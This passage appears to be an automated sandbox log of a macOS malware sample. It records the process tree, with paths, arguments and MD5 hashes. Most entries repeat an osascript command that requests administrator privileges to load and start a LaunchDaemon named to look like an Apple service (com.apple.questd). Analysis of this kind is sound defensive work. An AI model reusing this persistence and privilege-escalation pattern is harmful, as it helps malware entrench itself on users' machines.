                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:20:34
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl start questd
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:21:07
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:21:07
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:21:07
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:n/a
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:21:07
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/libexec/security_authtrampoline
                                                                                                    Arguments:/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 20 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:19120 bytes
                                                                                                    MD5 hash:f55206da7dd9b6699ecb7e3e8ce994f7

                                                                                                    General

                                                                                                    Start time:14:21:07
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:21:07
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:21:07
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:21:07
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:21:07
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:21:07
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:21:07
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl start questd
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:21:08
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:21:08
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:21:08
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:n/a
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:21:08
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/libexec/security_authtrampoline
                                                                                                    Arguments:/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 21 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:19120 bytes
                                                                                                    MD5 hash:f55206da7dd9b6699ecb7e3e8ce994f7

                                                                                                    General

                                                                                                    Start time:14:21:08
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:21:08
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:21:08
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:21:08
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:21:08
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:21:08
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:21:08
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl start questd
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:21:08
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:21:08
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:21:08
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:n/a
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:21:08
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/libexec/security_authtrampoline
                                                                                                    Arguments:/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 21 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:19120 bytes
                                                                                                    MD5 hash:f55206da7dd9b6699ecb7e3e8ce994f7

                                                                                                    General

                                                                                                    Start time:14:21:08
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:21:08
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:21:08
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:21:08
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:21:08
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:21:08
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:21:08
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl start questd
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:21:08
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:21:08
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:21:08
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:n/a
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:21:08
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/libexec/security_authtrampoline
                                                                                                    Arguments:/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 21 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:19120 bytes
                                                                                                    MD5 hash:f55206da7dd9b6699ecb7e3e8ce994f7

                                                                                                    General

                                                                                                    Start time:14:21:08
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:21:08
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
                                                                                                    Arguments:/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:17904 bytes
                                                                                                    MD5 hash:cb71c60e99e14478dede15b269f4517f

                                                                                                    General

                                                                                                    Start time:14:21:08
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:21:08
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:21:08
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:21:08
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:21:08
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/launchctl
                                                                                                    Arguments:launchctl start questd
                                                                                                    File size:121296 bytes
                                                                                                    MD5 hash:3e04cf4fe184467aa2dbf4e4d5c72f3d

                                                                                                    General

                                                                                                    Start time:14:21:09
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/bin/sh
                                                                                                    Arguments:n/a
                                                                                                    File size:618480 bytes
                                                                                                    MD5 hash:348affb69862798fd7b2f8874437f649

                                                                                                    General

                                                                                                    Start time:14:21:09
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:21:09
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/bin/osascript
                                                                                                    Arguments:n/a
                                                                                                    File size:43232 bytes
                                                                                                    MD5 hash:bec2959dde44c809741cf5069e08bf0f

                                                                                                    General

                                                                                                    Start time:14:21:09
                                                                                                    Start date:01/07/2020
                                                                                                    Path:/usr/libexec/security_authtrampoline
                                                                                                    Arguments:/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 21 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
                                                                                                    File size:19120 bytes
                                                                                                    MD5 hash:f55206da7dd9b6699ecb7e3e8ce994f7